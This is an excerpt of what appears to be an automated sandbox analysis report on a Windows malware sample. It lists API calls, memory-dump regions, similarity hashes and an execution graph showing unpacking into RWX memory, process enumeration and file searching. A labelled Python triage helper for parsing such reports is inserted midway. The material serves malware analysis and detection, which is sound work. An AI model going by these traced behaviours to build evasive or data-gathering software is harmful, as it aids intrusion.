• lstrcatW.KERNEL32(?,?,?,?,?,?,367B190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 367B165A
• lstrlenW.KERNEL32(?,?,?,?,?,367B190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 367B1661
• lstrcatW.KERNEL32(00001008,?,?,?,?,?,367B190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 367B1686
Memory Dump Source
• Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
• Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: lstrcatlstrlen
• String ID:
• API String ID: 1475610065-0
• Opcode ID: 3ffad3cae6ca35135864fe4548f91e07f4660612597d3756c91e7e65806743d7
• Instruction ID: dea87ffdfc5aaefc3292d8e67e0b9356d1e9eb994af2615ef02bf4262ab39cd9
• Opcode Fuzzy Hash: 3ffad3cae6ca35135864fe4548f91e07f4660612597d3756c91e7e65806743d7
• Instruction Fuzzy Hash: 0821C836900204ABDB05DF54DC84EFE7BB9EF88710F64446AE604EF145EF34A54287B6
APIs
• GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00402028
  • Part of subcall function 0040508C: lstrlenA.KERNEL32(0042A050,00000000,?,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
  • Part of subcall function 0040508C: lstrlenA.KERNEL32(004030DC,0042A050,00000000,?,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
  • Part of subcall function 0040508C: lstrcatA.KERNEL32(0042A050,004030DC,004030DC,0042A050,00000000,?,761F23A0), ref: 004050E8
  • Part of subcall function 0040508C: SetWindowTextA.USER32(0042A050,0042A050), ref: 004050FA
  • Part of subcall function 0040508C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
  • Part of subcall function 0040508C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
  • Part of subcall function 0040508C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
• LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402038
• GetProcAddress.KERNEL32(00000000,?), ref: 00402048
• FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B2
Memory Dump Source
• Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
• String ID:
• API String ID: 2987980305-0
• Opcode ID: 6502492516440c40321f6c440113f9ce282d7bb2c3c872fdf5e33247a2bec000
• Instruction ID: 3b54ba627a5d3606a08c88bc2c88048367fe0e0edc5ddf34d35ff9eabd327fef
• Opcode Fuzzy Hash: 6502492516440c40321f6c440113f9ce282d7bb2c3c872fdf5e33247a2bec000
• Instruction Fuzzy Hash: A721DB71A04225ABCF207FA48E49B6E7670AB14358F20413BFB11B62D0CBBD4942966E
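The entry above (GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary in the image at 00400000) and the neighbouring entries whose Memory Dump Source is the region at 367B0000 are exactly what a triager wants to pull out of a report this long without reading every block. The helper below is an added example, not code from this report or from Joe Sandbox: it parses the "APIs" and "Memory Dump Source" lines in the format shown on this page, decodes two fields of the .sdmp file name, and flags functions that live in private RWX memory or resolve imports at runtime. The field interpretation is an assumption inferred from the values on this page (5th dot-separated field = page protection, 7th = region type, both as winnt.h constants) and is not documented here; the sample input is constructed from two entries on this page.

```python
"""Added triage helper for Joe Sandbox per-function entries (example code, not
part of the report or of Joe Sandbox).  Assumption: in a .sdmp file name the
5th dot-separated field is the page protection and the 7th the region type,
both winnt.h constants; the other fields are not interpreted."""
import re

# winnt.h constants the classification relies on
PAGE_EXECUTE_READWRITE = 0x40
MEM_PRIVATE = 0x20000
MEM_IMAGE = 0x1000000

# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR" (no argument list)
API_RE = re.compile(r"(\w+)\.(\w+)(?:\((.*?)\))?,?\s+ref:\s*([0-9A-Fa-f]{8})")
# "Source File: <8 dot-separated fields>.sdmp, Offset: ADDR, ..."
SRC_RE = re.compile(
    r"Source File:\s*[0-9A-F]{8}\.[0-9A-F]{8}\.\d+\.([0-9A-F]{16})\.([0-9A-F]{8})"
    r"\.[0-9A-F]{8}\.([0-9A-F]{8})\.[0-9A-F]{8}\.sdmp,\s*Offset:\s*([0-9A-F]{8})")

# A function that both loads a module and resolves an export by name is
# resolving imports at runtime; in unpacked memory that deserves a look.
RESOLVER_APIS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA",
                 "LoadLibraryExW", "GetProcAddress"}


def parse_entries(text):
    """Split report text into per-function dicts {'apis': [...], 'region': {...}}."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                      # each entry starts with this header
            cur = {"apis": [], "region": None}
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.search(line)
        if m:
            name, module, args, ref = m.groups()
            cur["apis"].append({
                "api": name, "module": module,
                "args": [a for a in (args or "").split(",") if a],
                "ref": int(ref, 16),
                "subcall": "Part of subcall function" in line,
            })
            continue
        m = SRC_RE.search(line)
        if m:
            base, protect, mtype, offset = m.groups()
            cur["region"] = {"base": int(base, 16), "protect": int(protect, 16),
                             "type": int(mtype, 16), "offset": int(offset, 16)}
    return entries


def classify_region(region):
    """'image' for a mapped PE, 'private-rwx' for private RWX memory (typical
    of unpacked or injected code), otherwise 'other' / 'unknown'."""
    if region is None:
        return "unknown"
    if region["type"] & MEM_IMAGE:
        return "image"
    if region["type"] & MEM_PRIVATE and region["protect"] == PAGE_EXECUTE_READWRITE:
        return "private-rwx"
    return "other"


def triage(entries):
    """One finding per entry: where the function lives and whether it resolves
    imports at runtime (subcall lines belong to callees and are not counted)."""
    findings = []
    for e in entries:
        direct = {a["api"] for a in e["apis"] if not a["subcall"]}
        findings.append({
            "first_ref": hex(e["apis"][0]["ref"]) if e["apis"] else None,
            "region": classify_region(e["region"]),
            "runtime_import_resolution": bool(direct & RESOLVER_APIS),
            "api_count": len(e["apis"]),
        })
    return findings


# Constructed sample: two entries reduced from this report (stub at 00400000,
# private region at 367B0000).
SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00402028
  • Part of subcall function 0040508C: lstrlenA.KERNEL32(0042A050,00000000,?,761F23A0,?), ref: 004050C5
• LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402038
• GetProcAddress.KERNEL32(00000000,?), ref: 00402048
Memory Dump Source
• Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 367B715C
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 367B717F
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 367B71C7
Memory Dump Source
• Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
"""

if __name__ == "__main__":
    for finding in triage(parse_entries(SAMPLE)):
        print(finding)
```

Run stand-alone it prints one finding per entry. On the constructed sample the function at 00402028 classifies as a mapped image that resolves imports at runtime, while the function at 367B715C classifies as private RWX, which is the pattern the report's "Detected unpacking" signature describes; feed it the full report text to get the same split for every entry.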
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 367B715C
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 367B717F
  • Part of subcall function 367B56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 367B5702
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 367B71A5
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 367B71C7
Memory Dump Source
• Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
• Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
• String ID:
• API String ID: 1794362364-0
• Opcode ID: 1f857ddc2822e2c76489f30c85ae04609d3bd6db269cb549c3b468cd18312b5e
• Instruction ID: 2913ae7c7977a55ee1f19fa654b39bc02948104f836738002e5f26736954fd8d
• Opcode Fuzzy Hash: 1f857ddc2822e2c76489f30c85ae04609d3bd6db269cb549c3b468cd18312b5e
• Instruction Fuzzy Hash: 1F01ACB6A112197F3B110AB74C9CDBB6A6FDEC69A43D44129FE04DF340EE608C02C2B1
APIs
• RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C19
• RegCloseKey.ADVAPI32(?), ref: 00402C22
• RegCloseKey.ADVAPI32(?), ref: 00402C43
Memory Dump Source
• Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Similarity
                                                                                                                                                                                    • API ID: Close$Enum
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 464197530-0
                                                                                                                                                                                    • Opcode ID: 24478c4bf15825225cc5c8a9b60ec975c192d416f9cfe0da761514a225b2f336
                                                                                                                                                                                    • Instruction ID: b62f4967d327be975f6bbb281b4945b449d6b6e398a7fc8ef6fb9c274ae0afe8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 24478c4bf15825225cc5c8a9b60ec975c192d416f9cfe0da761514a225b2f336
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A118832500109BBEF01AF91CF09B9E3B79EF08341F104036BA05B50E0E7B4EE52AB68
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,367B1D66,00000000,00000000,?,367B5C88,367B1D66,00000000,00000000,00000000,?,367B5E85,00000006,FlsSetValue), ref: 367B5D13
                                                                                                                                                                                    • GetLastError.KERNEL32(?,367B5C88,367B1D66,00000000,00000000,00000000,?,367B5E85,00000006,FlsSetValue,367BE190,FlsSetValue,00000000,00000364,?,367B5BC8), ref: 367B5D1F
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,367B5C88,367B1D66,00000000,00000000,00000000,?,367B5E85,00000006,FlsSetValue,367BE190,FlsSetValue,00000000), ref: 367B5D2D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                    • Opcode ID: 5c178053a13e77a6ff52db051dcc20086a06b4be2518da0ebeb24c4c28fb029e
                                                                                                                                                                                    • Instruction ID: 55116ce76b6a2a6d57e3d79add1264c5712b0c0e7a7d5031effccddcc7d133f7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c178053a13e77a6ff52db051dcc20086a06b4be2518da0ebeb24c4c28fb029e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 720188366253326BFB114E69ACC8E56775AAF057E1BF00720FA05EB140D730D802CAE0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,?,00436400), ref: 00405595
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004055A9
                                                                                                                                                                                    • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055BE
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004055C8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3449924974-0
                                                                                                                                                                                    • Opcode ID: 5ed0d1f38f2075833211856a8ebf7d2689aced5b3dcb66e6179e3f4d9a7ce916
                                                                                                                                                                                    • Instruction ID: d93b5df8f7ffc7c008eac1e7bdc238e6dcac3e6f5ce479452586b7e310885e58
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ed0d1f38f2075833211856a8ebf7d2689aced5b3dcb66e6179e3f4d9a7ce916
                                                                                                                                                                                    • Instruction Fuzzy Hash: 550108B1C00219EADF11DBA1CD047EFBFB9EF04354F00803AD545B6290D77896088FA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DestroyWindow.USER32(?,00000000,00402EC4,00000001), ref: 00402CF7
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402D15
                                                                                                                                                                                    • CreateDialogParamA.USER32(0000006F,00000000,00402C61,00000000), ref: 00402D32
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402D40
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                                                                    • Opcode ID: 2469aab9b0bab78131693435c259bb338fdfc1179cff7f610c16a2f3c60769c5
                                                                                                                                                                                    • Instruction ID: 5343e4f3fd542578671bd54a8d6f819db7b5394acccd132b40ed42660498aa91
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2469aab9b0bab78131693435c259bb338fdfc1179cff7f610c16a2f3c60769c5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 01F05430601521EBC7207F24FE8CA8F7A64BB08B11791047AF445B21F4DBB448C28B9C
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0040502F
                                                                                                                                                                                    • CallWindowProcA.USER32(?,?,?,?), ref: 00405080
                                                                                                                                                                                      • Part of subcall function 00404072: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00404084
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                                                                    • Opcode ID: 0b5703a8dab1bd1bd7dd9e2c337de487c6e053b4983eba3ecfb903a9c205ce24
                                                                                                                                                                                    • Instruction ID: 2f0027df7ddfe28b71d6e39f600ecebaf2ba5c74aec8f2e947ae9809186c917a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b5703a8dab1bd1bd7dd9e2c337de487c6e053b4983eba3ecfb903a9c205ce24
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48017171500609ABDF205F51DD80E6F3B65EB84754F14403BFA01751D2C77A8CA29F9A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405B41
                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B5B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                                                                    • String ID: nsa
                                                                                                                                                                                    • API String ID: 1716503409-2209301699
                                                                                                                                                                                    • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                                                                                                                                                    • Instruction ID: 439a7608ba980c1fff97265348ba0c774925dff8d33d3cb941cf273fff524f8a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                                                                                                                                                    • Instruction Fuzzy Hash: B0F082363042086BDB108F66DD04B9B7BA9DF91750F14803BFA48AA280D6B4E9588799
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetOEMCP.KERNEL32(00000000,?,?,367B6C7C,?), ref: 367B6A1E
                                                                                                                                                                                    • GetACP.KERNEL32(00000000,?,?,367B6C7C,?), ref: 367B6A35
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: |l{6
                                                                                                                                                                                    • API String ID: 0-1108461528
                                                                                                                                                                                    • Opcode ID: 8b334d83cdbd10e18e422f964297ba443ea338c5bb72a0e9bb28f6cb8ec0ae4f
                                                                                                                                                                                    • Instruction ID: 0f6172eaeca90a009099a131d95631235f90a1eba5571034e53eb37495a7e700
• Opcode Fuzzy Hash: 8b334d83cdbd10e18e422f964297ba443ea338c5bb72a0e9bb28f6cb8ec0ae4f
• Instruction Fuzzy Hash: 5DF037348102198FEF20DB68C498BAC7772BF0133AFA48758E6289B1D5DB759956CF81
APIs
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C078,Error launching installer), ref: 0040562D
• CloseHandle.KERNEL32(?), ref: 0040563A
Strings
• Error launching installer, xrefs: 00405617
Memory Dump Source
• Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
• Opcode ID: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
• Instruction ID: a14d50d96640d218925096829ca07d1800dc2b789f456133151d87fd2ad2a836
• Opcode Fuzzy Hash: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
• Instruction Fuzzy Hash: 9EE046F0640209BFEB109FA0ED49F7F7AACEB00704F404921BD00F2290E67499088A7C
APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A73
• lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A8B
• CharNextA.USER32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A9C
• lstrlenA.KERNEL32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AA5
Memory Dump Source
• Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
• Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
• Instruction ID: de8867e187cffd76a1833f018909c3af52f45fcf8c0597c8515af2ce59788131
• Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
• Instruction Fuzzy Hash: F5F0C231201818AFCB02DBA4CD80D9EBBA8EF46350B2540B9E840F7211D774DE019FA9

Execution Graph

Execution Coverage: 6.7%
Dynamic/Decrypted Code Coverage: 9.2%
Signature Coverage: 3.2%
Total number of Nodes: 2000
Total number of Limit Nodes: 80
calls 38616->38617 38618 4088c0 38617->38618 38619 409d1f 6 API calls 38618->38619 38620 4088d0 38619->38620 38621 40b2cc 27 API calls 38620->38621 38622 4088df 38621->38622 38623 409d1f 6 API calls 38622->38623 38624 4088ef 38623->38624 38625 40b2cc 27 API calls 38624->38625 38626 4088fe 38625->38626 38627 409d1f 6 API calls 38626->38627 38639 408953 38639->38367 38659 40b633 free 38658->38659 38660 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38659->38660 38661 413f00 Process32NextW 38660->38661 38662 413da5 OpenProcess 38661->38662 38663 413f17 CloseHandle 38661->38663 38664 413eb0 38662->38664 38665 413df3 memset 38662->38665 38663->38404 38664->38661 38667 413ebf free 38664->38667 38668 4099f4 3 API calls 38664->38668 39807 413f27 38665->39807 38667->38664 38668->38664 38669 413e37 GetModuleHandleW 38671 413e46 GetProcAddress 38669->38671 38672 413e1f 38669->38672 38671->38672 38672->38669 39812 413959 38672->39812 39828 413ca4 38672->39828 38674 413ea2 CloseHandle 38674->38664 38676 414c2e 17 API calls 38675->38676 38677 403eb7 38676->38677 38678 414c2e 17 API calls 38677->38678 38679 403ec5 38678->38679 38680 409d1f 6 API calls 38679->38680 38681 403ee2 38680->38681 38682 409d1f 6 API calls 38681->38682 38683 403efd 38682->38683 38684 409d1f 6 API calls 38683->38684 38685 403f15 38684->38685 38686 403af5 20 API calls 38685->38686 38687 403f29 38686->38687 38688 403af5 20 API calls 38687->38688 38689 403f3a 38688->38689 38690 40414f 33 API calls 38689->38690 38696 403f4f 38690->38696 38691 403faf 39842 40b1ab free free 38691->39842 38693 403f5b memset 38693->38696 38694 403fb7 38694->38340 38695 4099c6 2 API calls 38695->38696 38696->38691 38696->38693 38696->38695 38697 40a8ab 9 API calls 38696->38697 38697->38696 38699 414c2e 17 API calls 38698->38699 38700 403d26 38699->38700 38701 414c2e 17 API calls 38700->38701 38702 403d34 38701->38702 38703 409d1f 6 API calls 38702->38703 38704 403d51 38703->38704 38705 409d1f 6 API calls 38704->38705 38706 
403d6c 38705->38706 38707 409d1f 6 API calls 38706->38707 38708 403d84 38707->38708 38709 403af5 20 API calls 38708->38709 38710 403d98 38709->38710 38711 403af5 20 API calls 38710->38711 38712 403da9 38711->38712 38713 40414f 33 API calls 38712->38713 38718 403dbe 38713->38718 38714 403e1e 39843 40b1ab free free 38714->39843 38716 403dca memset 38716->38718 38717 403e26 38717->38355 38718->38714 38718->38716 38719 4099c6 2 API calls 38718->38719 38720 40a8ab 9 API calls 38718->38720 38719->38718 38720->38718 38722 414b81 9 API calls 38721->38722 38724 414c40 38722->38724 38723 414c73 memset 38726 414c94 38723->38726 38724->38723 39844 409cea 38724->39844 39847 414592 RegOpenKeyExW 38726->39847 38729 414c64 SHGetSpecialFolderPathW 38731 414d0b 38729->38731 38730 414cc1 38732 414cf4 wcscpy 38730->38732 39848 414bb0 wcscpy 38730->39848 38731->38347 38732->38731 38734 414cd2 39849 4145ac RegQueryValueExW 38734->39849 38736 414ce9 RegCloseKey 38736->38732 38738 409d62 38737->38738 38739 409d43 wcscpy 38737->38739 38738->38378 38740 409719 2 API calls 38739->38740 38741 409d51 wcscat 38740->38741 38741->38738 38743 40aebe FindClose 38742->38743 38744 40ae21 38743->38744 38745 4099c6 2 API calls 38744->38745 38746 40ae35 38745->38746 38747 409d1f 6 API calls 38746->38747 38748 40ae49 38747->38748 38748->38447 38750 40ade0 38749->38750 38753 40ae0f 38749->38753 38751 40ade7 wcscmp 38750->38751 38750->38753 38752 40adfe wcscmp 38751->38752 38751->38753 38752->38753 38753->38447 38755 40ae18 9 API calls 38754->38755 38760 4453c4 38755->38760 38756 40ae51 9 API calls 38756->38760 38757 4453f3 38759 40aebe FindClose 38757->38759 38758 40add4 2 API calls 38758->38760 38761 4453fe 38759->38761 38760->38756 38760->38757 38760->38758 38762 445403 254 API calls 38760->38762 38761->38447 38762->38760 38764 40ae7b FindNextFileW 38763->38764 38765 40ae5c FindFirstFileW 38763->38765 38766 40ae94 38764->38766 38767 40ae8f 38764->38767 38765->38766 38769 40aeb6 38766->38769 38770 409d1f 
